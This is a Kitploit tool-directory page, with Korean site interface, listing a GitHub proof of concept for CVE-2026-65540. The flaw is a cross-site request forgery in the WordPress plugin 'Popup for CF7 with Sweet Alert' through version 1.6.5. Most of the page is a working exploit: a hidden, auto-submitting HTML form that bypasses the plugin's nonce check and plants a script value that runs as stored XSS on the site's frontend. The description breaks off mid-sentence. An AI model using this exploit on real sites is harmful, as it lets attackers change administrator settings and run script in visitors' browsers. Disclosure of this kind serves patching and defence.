Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-65540 — Popup for CF7 with Sweet Alert <= 1.6.5 - Cross-Site Request Forgery | Kitploit
도구/GitHubGitHub/testardou/cve-2026-65540
Web Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

저장소 보기
2117일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

Plugin URL

https://wordpress.org/plugins/cf7-sweet-alert-popup/

Description

The plugin's settings handler contains a logic error in its nonce verification disabling all CSRF protection. An unauthenticated attacker can exploit this by tricking an authenticated administrator into visiting a malicious page with a hidden auto-submitting form, arbitrarily modifying the plugin settings.
The submitted values are stored without sanitization and injected verbatim into a

POC

  1. Host the following HTML page on a separate server:
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. Log in to WordPress as an administrator
  2. Visit the malicious page
  3. (Optional) Navigate to http://TARGET/wp-admin/admin.php?page=cf7-simplepopup — confirm the Width field now contains 500;alert(document.domain)
  4. Visit any frontend page, alert(document.domain) executes in the browser confirming stored XSS
도구 다운로드